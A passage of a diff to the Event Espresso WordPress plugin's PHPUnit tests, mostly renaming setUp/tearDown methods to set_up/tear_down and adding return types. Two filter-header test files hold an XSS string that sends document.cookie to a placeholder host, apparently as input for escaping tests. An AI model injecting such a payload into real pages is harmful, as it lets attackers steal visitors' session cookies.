+    public function test_get_all__caps__delete__no_assign_event_category()
+    {
+        //log the user in
+        global $current_user;
+        $current_user = $this->user;
+        $current_user->add_cap('ee_edit_events');
+
+        //now check they can only see the term relationship for their own event
+        $term_rs = EEM_Term_Relationship::instance()->get_all(
+            [
+                [
+                    'object_id' => ['IN', [$this->my_event->ID(), $this->others_event->ID()]],
+                ],
+                'order_by' => ['object_id' => 'ASC'],
+                'caps'     => EEM_Base::caps_delete,
+            ]
+        );
+        $this->assertEquals(0, count($term_rs));
+    }
+
+
+    /**
+     * @throws EE_Error
+     * @throws ReflectionException
+     */
+    public function test_get_all__caps__delete__with_assign_event_category()
+    {
+        //log the user in
+        global $current_user;
+        $current_user = $this->user;
+        $current_user->add_cap('ee_edit_events');
+        $current_user->add_cap('ee_assign_event_category');
+
+        //now check they can only see the term relationship for their own event
+        $term_rs = EEM_Term_Relationship::instance()->get_all(
+            [
+                [
+                    'object_id' => ['IN', [$this->my_event->ID(), $this->others_event->ID()]],
+                ],
+                'order_by' => ['object_id' => 'ASC'],
+                'caps'     => EEM_Base::caps_delete,
+            ]
+        );
+        $this->assertEEModelObjectsEquals($this->term_r_for_my_event, reset($term_rs));
+        $this->assertEquals(1, count($term_rs));
+    }
 }
-
 // End of file EEM_Term_Relationship_Caps_Test.php

--- a/tests/testcases/core/db_models/EEM_Ticket_Caps_Test.php
+++ b/tests/testcases/core/db_models/EEM_Ticket_Caps_Test.php
@@ -69,8 +69,8 @@ class EEM_Ticket_Caps_Test extends EE_UnitTestCase{
 	 * @var EE_Event
 	 */
 	public $e_private;
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		//let's make sure we start off with NO tickets in the DB
 		EEM_Ticket::instance()->delete_permanently( EEM_Ticket::instance()->alter_query_params_so_deleted_and_undeleted_items_included(), false );
 		$this->assertEquals( 0, EEM_Ticket::instance()->count( EEM_Ticket::instance()->alter_query_params_so_deleted_and_undeleted_items_included() ) );

--- a/tests/testcases/core/db_models/EEM_WP_User_Caps_Test.php
+++ b/tests/testcases/core/db_models/EEM_WP_User_Caps_Test.php
@@ -30,8 +30,8 @@ class EEM_WP_User_Caps_Test extends EE_UnitTestCase{
 	 */
 	public $somebody_else;
 
-	public function setUp(){
-		parent::setUp();
+	public function set_up(){
+		parent::set_up();
 		//clean out hte WP User table for these tests
 		EEM_WP_User::instance()->delete( array(), false );
 		$this->me = $this->factory->user->create_and_get();

--- a/tests/testcases/core/db_models/EemDatetimeTicketTest.php
+++ b/tests/testcases/core/db_models/EemDatetimeTicketTest.php
@@ -24,9 +24,9 @@ class EemDatetimeTicketTest extends EE_UnitTestCase
      * @throws \EventEspresso\core\exceptions\InvalidDataTypeException
      * @throws \EventEspresso\core\exceptions\InvalidInterfaceException
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->model = EEM_Datetime_Ticket::instance();
     }
 

--- a/tests/testcases/core/db_models/EemEventVenueTest.php
+++ b/tests/testcases/core/db_models/EemEventVenueTest.php
@@ -24,9 +24,9 @@ class EemEventVenueTest extends EE_UnitTestCase
      * @throws \EventEspresso\core\exceptions\InvalidDataTypeException
      * @throws \EventEspresso\core\exceptions\InvalidInterfaceException
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->model = EEM_Event_Venue::instance();
     }
 

--- a/tests/testcases/core/db_models/fields/EE_All_Caps_Text_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_All_Caps_Text_Field_Test.php
@@ -20,18 +20,18 @@ class EE_All_Caps_Text_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Payment::instance()->field_settings_for('PAY_source');
         $this->assertInstanceOf('EE_All_Caps_Text_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Any_Foreign_Model_Name_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Any_Foreign_Model_Name_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Any_Foreign_Model_Name_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Extra_Meta::instance()->field_settings_for('EXM_type');
         $this->assertInstanceOf('EE_Any_Foreign_Model_Name_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Boolean_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Boolean_Field_Test.php
@@ -21,18 +21,18 @@ class EE_Boolean_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Checkin::instance()->field_settings_for('CHK_in');
         $this->assertInstanceOf('EE_Boolean_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_DB_Only_Float_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_DB_Only_Float_Field_Test.php
@@ -20,18 +20,18 @@ class EE_DB_Only_Float_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Event::instance()->field_settings_for('EVTM_ID');
         $this->assertInstanceOf('EE_DB_Only_Float_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_DB_Only_Int_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_DB_Only_Int_Field_Test.php
@@ -20,18 +20,18 @@ class EE_DB_Only_Int_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Attendee::instance()->field_settings_for('ATT_parent');
         $this->assertInstanceOf('EE_DB_Only_Int_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_DB_Only_Text_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_DB_Only_Text_Field_Test.php
@@ -20,18 +20,18 @@ class EE_DB_Only_Text_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = new EE_DB_Only_Text_Field('post_type', esc_html__("Post Type", 'event_espresso'), false, 'espresso_events');
         $this->assertInstanceOf('EE_DB_Only_Text_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Datetime_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Datetime_Field_Test.php
@@ -45,9 +45,9 @@ class EE_Datetime_Field_Test extends EE_UnitTestCase
     protected $_defaultDTT;
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->loadModelFieldMocks(array('EE_Datetime_Field'));
     }
 

--- a/tests/testcases/core/db_models/fields/EE_Datetime_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Datetime_Field_Test.php
@@ -295,12 +295,12 @@ class EE_Datetime_Field_Test extends EE_UnitTestCase
      * invalid DateTime object on a non-nullable field and WP_DEBUG is true.
      *
      * @since                       4.7.0
-     * @expectedException    EE_Error
      * @expectedExceptionMessage    EE_Datetime_Field::_prepare_for_display requires a DateTime class to be the value
      *                              for the $DateTime argument because the Start Date field is not nullable.
      */
     public function test_prepare_for_display_with_exception()
     {
+        $this->setExceptionExpected('EE_Error');
         $this->_set_dtt_field_object();
         if (defined('WP_DEBUG') && ! WP_DEBUG) {
             $this->markTestSkipped('Unable to complete test because WP_DEBUG is already defined and is set to false');

--- a/tests/testcases/core/db_models/fields/EE_Email_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Email_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Email_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Attendee::instance()->field_settings_for('ATT_email');
         $this->assertInstanceOf('EE_Email_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Enum_Integer_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Enum_Integer_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Enum_Integer_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Message::instance()->field_settings_for('MSG_priority');
         $this->assertInstanceOf('EE_Enum_Integer_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Enum_Text_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Enum_Text_Field_Test.php
@@ -23,9 +23,9 @@ class EE_Enum_Text_Field_Test extends EE_UnitTestCase
 
 
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_an_enum_field = new EE_Enum_Text_Field(
             'A_field',
             'some field',

--- a/tests/testcases/core/db_models/fields/EE_Float_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Float_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Float_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Line_Item::instance()->field_settings_for('LIN_percent');
         $this->assertInstanceOf('EE_Float_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Foreign_Key_Int_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Foreign_Key_Int_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Foreign_Key_Int_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Checkin::instance()->field_settings_for('REG_ID');
         $this->assertInstanceOf('EE_Foreign_Key_Int_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Foreign_Key_String_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Foreign_Key_String_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Foreign_Key_String_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Attendee::instance()->field_settings_for('CNT_ISO');
         $this->assertInstanceOf('EE_Foreign_Key_String_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Full_HTML_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Full_HTML_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Full_HTML_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Line_Item::instance()->field_settings_for('LIN_name');
         $this->assertInstanceOf('EE_Full_HTML_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Infinite_Integer_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Infinite_Integer_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Infinite_Integer_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Ticket::instance()->field_settings_for('TKT_qty');
         $this->assertInstanceOf('EE_Infinite_Integer_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Integer_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Integer_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Integer_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Datetime::instance()->field_settings_for('DTT_sold');
         $this->assertInstanceOf('EE_Integer_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Maybe_Serialized_Simple_HTML_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Maybe_Serialized_Simple_HTML_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Maybe_Serialized_Simple_HTML_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Answer::instance()->field_settings_for('ANS_value');
         $this->assertInstanceOf('EE_Maybe_Serialized_Simple_HTML_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Maybe_Serialized_Text_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Maybe_Serialized_Text_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Maybe_Serialized_Text_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Message::instance()->field_settings_for('MSG_content');
         $this->assertInstanceOf('EE_Maybe_Serialized_Text_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Money_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Money_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Money_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Price::instance()->field_settings_for('PRC_amount');
         $this->assertInstanceOf('EE_Money_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Plain_Text_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Plain_Text_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Plain_Text_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Message::instance()->field_settings_for('MSG_token');
         $this->assertInstanceOf('EE_Plain_Text_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Post_Content_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Post_Content_Field_Test.php
@@ -21,18 +21,18 @@ class EE_Post_Content_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Event::instance()->field_settings_for('EVT_desc');
         $this->assertInstanceOf('EE_Post_Content_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Primary_Key_Int_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Primary_Key_Int_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Primary_Key_Int_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Message::instance()->field_settings_for('MSG_ID');
         $this->assertInstanceOf('EE_Primary_Key_Int_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Primary_Key_String_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Primary_Key_String_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Primary_Key_String_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Country::instance()->field_settings_for('CNT_ISO');
         $this->assertInstanceOf('EE_Primary_Key_String_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Serialized_Text_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Serialized_Text_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Serialized_Text_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Transaction::instance()->field_settings_for('TXN_session_data');
         $this->assertInstanceOf('EE_Serialized_Text_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Simple_HTML_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Simple_HTML_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Simple_HTML_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Event::instance()->field_settings_for('EVT_short_desc');
         $this->assertInstanceOf('EE_Simple_HTML_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Slug_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Slug_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Slug_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Event::instance()->field_settings_for('EVT_slug');
         $this->assertInstanceOf('EE_Slug_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_Trashed_Flag_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_Trashed_Flag_Field_Test.php
@@ -20,18 +20,18 @@ class EE_Trashed_Flag_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Registration::instance()->field_settings_for('REG_deleted');
         $this->assertInstanceOf('EE_Trashed_Flag_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_WP_Post_Status_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_WP_Post_Status_Field_Test.php
@@ -20,18 +20,18 @@ class EE_WP_Post_Status_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Event::instance()->field_settings_for('status');
         $this->assertInstanceOf('EE_WP_Post_Status_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_WP_Post_Type_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_WP_Post_Type_Field_Test.php
@@ -20,18 +20,18 @@ class EE_WP_Post_Type_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Event::instance()->field_settings_for('post_type');
         $this->assertInstanceOf('EE_WP_Post_Type_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/db_models/fields/EE_WP_User_Field_Test.php
+++ b/tests/testcases/core/db_models/fields/EE_WP_User_Field_Test.php
@@ -20,18 +20,18 @@ class EE_WP_User_Field_Test extends EE_UnitTestCase
      */
     protected $_field;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->_field = EEM_Event::instance()->field_settings_for('EVT_wp_user');
         $this->assertInstanceOf('EE_WP_User_Field', $this->_field);
     }
 
 
-    public function tearDown()
+    public function tear_down()
     {
         $this->_field = null;
-        parent::tearDown();
+        parent::tear_down();
     }
 
 

--- a/tests/testcases/core/domain/DomainFactoryTest.php
+++ b/tests/testcases/core/domain/DomainFactoryTest.php
@@ -21,9 +21,9 @@ defined('EVENT_ESPRESSO_VERSION') || exit;
  */
 class DomainFactoryTest extends EE_UnitTestCase
 {
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         DomainFactoryMock::reset();
     }
 

--- a/tests/testcases/core/domain/entities/routing/specifications/RouteMatchSpecificationTestBase.php
+++ b/tests/testcases/core/domain/entities/routing/specifications/RouteMatchSpecificationTestBase.php
@@ -23,7 +23,7 @@ class RouteMatchSpecificationTestBase extends EspressoPHPUnitFrameworkTestCase
      * @param string $page_now
      * @since $VID:$
      */
-    public function setUp(string $page_now = 'admin.php')
+    public function setUp(string $page_now = 'admin.php'): void
     {
         parent::setUp();
         global $pagenow;
@@ -32,7 +32,7 @@ class RouteMatchSpecificationTestBase extends EspressoPHPUnitFrameworkTestCase
     }
 
 
-    public function tearDown()
+    public function tearDown(): void
     {
         global $pagenow;
         $pagenow = $this->pagenow;

--- a/tests/testcases/core/domain/services/admin/registrations/list_table/page_header/AttendeeFilterHeaderTest.php
+++ b/tests/testcases/core/domain/services/admin/registrations/list_table/page_header/AttendeeFilterHeaderTest.php
@@ -31,7 +31,7 @@ class AttendeeFilterHeaderTest extends TestCase
     private $xss = '"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>';
 
 
-    public static function setUpBeforeClass()
+    public static function setUpBeforeClass(): void
     {
         require_once EE_ADMIN . 'EE_Admin_Page.core.php';
         if (! defined('REG_ADMIN_URL')) {
@@ -49,7 +49,7 @@ class AttendeeFilterHeaderTest extends TestCase
      * @throws ReflectionException
      * @since 4.10.2.p
      */
-    public function setUp()
+    public function setUp(): void
     {
         $this->setUpAttendee();
     }
@@ -166,7 +166,7 @@ class AttendeeFilterHeaderTest extends TestCase
      */
     public function testGetHeaderText()
     {
-        foreach ($this->testDataGenerator() as list($get_params, $expected)) {
+        foreach ($this->testDataGenerator() as [$get_params, $expected]) {
             $this->assertInstanceOf('EE_Attendee', $this->attendee);
             $attendee_filter_header = $this->getAttendeeFilterHeader($get_params);
             $header_text = $attendee_filter_header->getHeaderText();

--- a/tests/testcases/core/domain/services/admin/registrations/list_table/page_header/DateFilterHeaderTest.php
+++ b/tests/testcases/core/domain/services/admin/registrations/list_table/page_header/DateFilterHeaderTest.php
@@ -41,7 +41,7 @@ class DateFilterHeaderTest extends TestCase
      * @throws ReflectionException
      * @since 4.10.2.p
      */
-    public function setUp()
+    public function setUp(): void
     {
         $this->setUpDatetime();
     }

--- a/tests/testcases/core/domain/services/admin/registrations/list_table/page_header/EventFilterHeaderTest.php
+++ b/tests/testcases/core/domain/services/admin/registrations/list_table/page_header/EventFilterHeaderTest.php
@@ -32,7 +32,7 @@ class EventFilterHeaderTest extends TestCase
     private $xss = '"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>';
 
 
-    public static function setUpBeforeClass()
+    public static function setUpBeforeClass(): void
     {
         require_once EE_ADMIN . 'EE_Admin_Page.core.php';
         if (! defined('EVENTS_ADMIN_URL')) {
@@ -50,7 +50,7 @@ class EventFilterHeaderTest extends TestCase
      * @throws ReflectionException
      * @since 4.10.2.p
      */
-    public function setUp()
+    public function setUp(): void
     {
         $this->setUpEvent();
     }
@@ -153,7 +153,7 @@ class EventFilterHeaderTest extends TestCase
      */
     public function testGetHeaderText()
     {
-        foreach ($this->testDataGenerator() as list($get_params, $expected)) {
+        foreach ($this->testDataGenerator() as [$get_params, $expected]) {
             $this->assertInstanceOf('EE_Event', $this->event);
             $event_filter_header = $this->getEventFilterHeader($get_params);
             $header_text = $event_filter_header->getHeaderText();

--- a/tests/testcases/core/domain/services/admin/registrations/list_table/page_header/TicketFilterHeaderTest.php
+++ b/tests/testcases/core/domain/services/admin/registrations/list_table/page_header/TicketFilterHeaderTest.php
@@ -47,7 +47,7 @@ class TicketFilterHeaderTest extends TestCase
      * @throws ReflectionException
      * @since 4.10.2.p
      */
-    public function setUp()
+    public function setUp(): void
     {
         $this->setUpTickets();
     }

--- a/tests/testcases/core/domain/services/custom_post_types/RegisterCustomPostTypesTest.php
+++ b/tests/testcases/core/domain/services/custom_post_types/RegisterCustomPostTypesTest.php
@@ -43,9 +43,9 @@ class RegisterCustomPostTypesTest extends EE_UnitTestCase
      * @throws InvalidInterfaceException
      * @throws InvalidArgumentException
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->custom_post_types = LoaderFactory::getLoader()->getShared(
             'EventEspresso\core\domain\entities\custom_post_types\CustomPostTypeDefinitions'
         );

--- a/tests/testcases/core/domain/services/custom_post_types/RegisterCustomTaxonomiesTest.php
+++ b/tests/testcases/core/domain/services/custom_post_types/RegisterCustomTaxonomiesTest.php
@@ -43,9 +43,9 @@ class RegisterCustomTaxonomiesTest extends EE_UnitTestCase
      * @throws InvalidInterfaceException
      * @throws InvalidArgumentException
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         $this->custom_taxonomies          = LoaderFactory::getLoader()->getShared(
             'EventEspresso\core\domain\entities\custom_post_types\CustomTaxonomyDefinitions'
         );

--- a/tests/testcases/core/domain/services/graphql/GraphQLUnitTestCase.php
+++ b/tests/testcases/core/domain/services/graphql/GraphQLUnitTestCase.php
@@ -22,10 +22,11 @@ use WPGraphQL\Router;
  * @author  Brent Christensen
  * @since   $VID:$
  */
-class GraphQLUnitTestCase extends EE_UnitTestCase
+abstract class GraphQLUnitTestCase extends EE_UnitTestCase
 {
 
     /**
+     * @throws EE_Error
      * @throws InvalidDataTypeException
      * @throws InvalidInterfaceException
      * @throws InvalidArgumentException

--- a/tests/testcases/core/domain/services/graphql/GraphQLUnitTestCase.php
+++ b/tests/testcases/core/domain/services/graphql/GraphQLUnitTestCase.php
@@ -31,9 +31,9 @@ class GraphQLUnitTestCase extends EE_UnitTestCase
      * @throws InvalidArgumentException
      * @since $VID:$
      */
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         if (PHP_VERSION_ID < 70100) {
             $this->markTestSkipped('WP GraphQL compatible with PHP 7+ only');
         }

--- a/tests/testcases/core/domain/services/graphql/connections/BaseQueriesTest.php
+++ b/tests/testcases/core/domain/services/graphql/connections/BaseQueriesTest.php
@@ -19,9 +19,9 @@ class BaseQueriesTest extends GraphQLUnitTestCase
     public $admin;
     public $subscriber;
 
-    public function setUp()
+    public function set_up()
     {
-        parent::setUp();
+        parent::set_up();
         if (!$this->model_name) {
             return;
         }

--- a/tests/testcases/core/domain/services/graphql/connections/BaseQueriesTest.php
+++ b/tests/testcases/core/domain/services/graphql/connections/BaseQueriesTest.php
@@ -2,13 +2,15 @@
 
 namespace EventEspresso\tests\testcases\core\domain\services\graphql\connections;
 
+use EE_Error;
+use EEM_Base;
 use EventEspresso\tests\testcases\core\domain\services\graphql\GraphQLUnitTestCase;
+use ReflectionException;
 use WPGraphQL\AppContext;
 use WPGraphQL;
 
-class BaseQueriesTest extends GraphQLUnitTestCase
